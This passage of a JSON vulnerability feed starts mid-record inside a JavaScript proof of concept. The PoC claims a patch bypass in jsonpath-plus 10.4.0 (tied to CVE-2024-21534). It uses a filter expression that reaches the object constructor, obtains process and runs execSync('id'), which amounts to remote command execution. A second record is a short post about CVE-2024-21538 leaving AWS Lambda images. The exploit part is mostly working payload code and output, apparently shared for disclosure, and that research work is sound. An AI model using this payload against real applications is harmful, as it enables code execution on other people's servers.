Function.bind({}) === Function);  // false \u2192 evalCallExpression guard is dead code\n\n// Step 2 \u2014 Filter expression accesses own constructor \u2192 escapes sandbox\nconst maliciousPath =\n  \"$.users[?(@.constructor('return process')().mainModule\" +\n  \".require('child_process').execSync('id').toString())]\";\n\nconsole.log('\\n[*] Running JSONPath with malicious filter expression...');\nconst result = JSONPath({ path: maliciousPath, json: data });\n\n// Step 3 \u2014 Confirm execution via side effect\nexecSync('id > /tmp/jsonpath-bypass-proof.txt');\nconst proof = fs.readFileSync('/tmp/jsonpath-bypass-proof.txt', 'utf8').trim();\n\nconsole.log('\\n[+] Matched items:', result.map(r => r.name));\nconsole.log('[+] OS command output:', proof);\nconsole.log('\\n[!] RCE confirmed on jsonpath-plus@10.4.0 (latest)');\nconsole.log('[!] CVE-2024-21534 patch bypass \u2014 BLOCKED_PROTO_PROPERTIES ineffective');\nconsole.log('    against own constructor property in deserialized objects');\n", "creation_timestamp": "2026-05-06T14:08:05.000000Z"}, {"uuid": "5c2c7034-73b0-43e0-a753-a40fa864728f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mlb672j4q72y", "content": "\ud83d\udd0d Lambda Watchdog detected that CVE-2024-21538 is no longer present in latest AWS Lambda base image scans. https://github.com/aws/aws-lambda-base-images/issues/214 #AWS #Lambda #Security #CVE #DevOps #SecOps", "creation_timestamp": "2026-05-07T12:01:24.339302Z"}]}